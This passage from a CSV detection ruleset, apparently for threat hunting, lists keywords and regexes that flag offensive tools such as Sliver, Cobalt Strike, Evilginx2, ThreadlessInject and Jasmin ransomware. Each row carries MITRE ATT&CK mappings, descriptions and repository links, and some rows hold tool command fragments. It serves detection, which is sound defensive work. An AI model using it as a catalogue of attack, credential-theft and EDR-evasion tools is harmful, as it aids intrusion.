Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Thank you for using DNSCrypt-Proxy!*",".{0,1000}Thank\syou\sfor\susing\sDNSCrypt\-Proxy!.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*Thanks for using GTFONow!*",".{0,1000}Thanks\sfor\susing\sGTFONow!.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*THASH /runts /user:*",".{0,1000}THASH\s\/runts\s\/user\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*thc-hydra*",".{0,1000}thc\-hydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*thc-hydra.git*",".{0,1000}thc\-hydra\.git.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*The backdoor just signaled an ACK. This should not have happened*",".{0,1000}The\sbackdoor\sjust\ssignaled\san\sACK\.\sThis\sshould\snot\shave\shappened.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*The implant command allows users to run commands on slivers from their*",".{0,1000}The\simplant\scommand\sallows\susers\sto\srun\scommands\son\sslivers\sfrom\stheir.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*The malware Go file has been completed.*",".{0,1000}The\smalware\sGo\sfile\shas\sbeen\scompleted\..{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*The Ransomware for RedTeams Coded by Siddhant Gour with *",".{0,1000}The\sRansomware\sfor\sRedTeams\sCoded\sby\sSiddhant\sGour\swith\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*The smart password spraying and bruteforcing tool for Active Directory Domain Services*",".{0,1000}The\ssmart\spassword\sspraying\sand\sbruteforcing\stool\sfor\sActive\sDirectory\sDomain\sServices.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*the-backdoor-factory-master*",".{0,1000}the\-backdoor\-factory\-master.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*TheCyb3rAlpha/BobTheSmuggler*",".{0,1000}TheCyb3rAlpha\/BobTheSmuggler.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*TheD1rkMtr/AMSI_patch*",".{0,1000}TheD1rkMtr\/AMSI_patch.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*TheD1rkMtr/D1rkInject*",".{0,1000}TheD1rkMtr\/D1rkInject.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*TheD1rkMtr/DocPlz*",".{0,1000}TheD1rkMtr\/DocPlz.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*TheD1rkMtr/GithubC2*",".{0,1000}TheD1rkMtr\/GithubC2.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TheD1rkMtr/HeapCrypt*",".{0,1000}TheD1rkMtr\/HeapCrypt.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*TheD1rkMtr/NTDLLReflection*",".{0,1000}TheD1rkMtr\/NTDLLReflection.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*TheD1rkMtr/Pspersist*",".{0,1000}TheD1rkMtr\/Pspersist.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*TheD1rkMtr/Shellcode-Hide*",".{0,1000}TheD1rkMtr\/Shellcode\-Hide.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*TheD1rkMtr/StackCrypt*",".{0,1000}TheD1rkMtr\/StackCrypt.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*TheD1rkMtr/UnhookingPatch*",".{0,1000}TheD1rkMtr\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*TheGejr/SpringShell*",".{0,1000}TheGejr\/SpringShell.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","127","85","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" "*theHarvester*",".{0,1000}theHarvester.{0,1000}","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","10357","1908","2024-04-30T21:39:29Z","2011-01-01T20:40:15Z" "*theHarvester.py -d *",".{0,1000}theHarvester\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*thelinuxchoice/tweetshell*",".{0,1000}thelinuxchoice\/tweetshell.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*ThemeBleed.exe *",".{0,1000}ThemeBleed\.exe\s\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*ThePorgs/Exegol-images*",".{0,1000}ThePorgs\/Exegol\-images.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*therealwover@protonmail.com*",".{0,1000}therealwover\@protonmail\.com.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*The-Viper-One/PME-Scripts*",".{0,1000}The\-Viper\-One\/PME\-Scripts.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*The-Viper-One/PsMapExec*",".{0,1000}The\-Viper\-One\/PsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*thewover/donut*",".{0,1000}thewover\/donut.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*thiagopeixoto/winsos-poc*",".{0,1000}thiagopeixoto\/winsos\-poc.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*thief.py -*",".{0,1000}thief\.py\s\-.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*third_party/SharpGen*",".{0,1000}third_party\/SharpGen.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*third-party*winvnc*.dll*",".{0,1000}third\-party.{0,1000}winvnc.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*This is the modified maintained version of Evilginx2. No one will be held responsible for your activities*",".{0,1000}This\sis\sthe\smodified\smaintained\sversion\sof\sEvilginx2\.\sNo\sone\swill\sbe\sheld\sresponsible\sfor\syour\sactivities.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","N/A","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*This option will cause DDSpoof to create DNS records on the server*",".{0,1000}This\soption\swill\scause\sDDSpoof\sto\screate\sDNS\srecords\son\sthe\sserver.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*this.is.not.a.phishing.site.evilsite.com*",".{0,1000}this\.is\.not\.a\.phishing\.site\.evilsite\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*thisisateststringdontcatchme*",".{0,1000}thisisateststringdontcatchme.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ThisIsNotRat-main*",".{0,1000}ThisIsNotRat\-main.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*thoth.py -*",".{0,1000}thoth\.py\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*thoth-master.zip*",".{0,1000}thoth\-master\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Thread_Hiijack_Inject_Load.*",".{0,1000}Thread_Hiijack_Inject_Load\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*thread-injector.exe *",".{0,1000}thread\-injector\.exe\s.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*Threadless injection failed*",".{0,1000}Threadless\sinjection\sfailed.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*ThreadlessInject* -p * -d *",".{0,1000}ThreadlessInject.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadlessInject.exe*",".{0,1000}ThreadlessInject\.exe.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadlessInject-master*",".{0,1000}ThreadlessInject\-master.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadPoolInjection.lastbuildstate*",".{0,1000}ThreadPoolInjection\.lastbuildstate.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*Thread-Pool-Injection-PoC-main*",".{0,1000}Thread\-Pool\-Injection\-PoC\-main.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*threads all alertable*",".{0,1000}threads\sall\salertable.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ThreadStackSpoofer*",".{0,1000}ThreadStackSpoofer.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 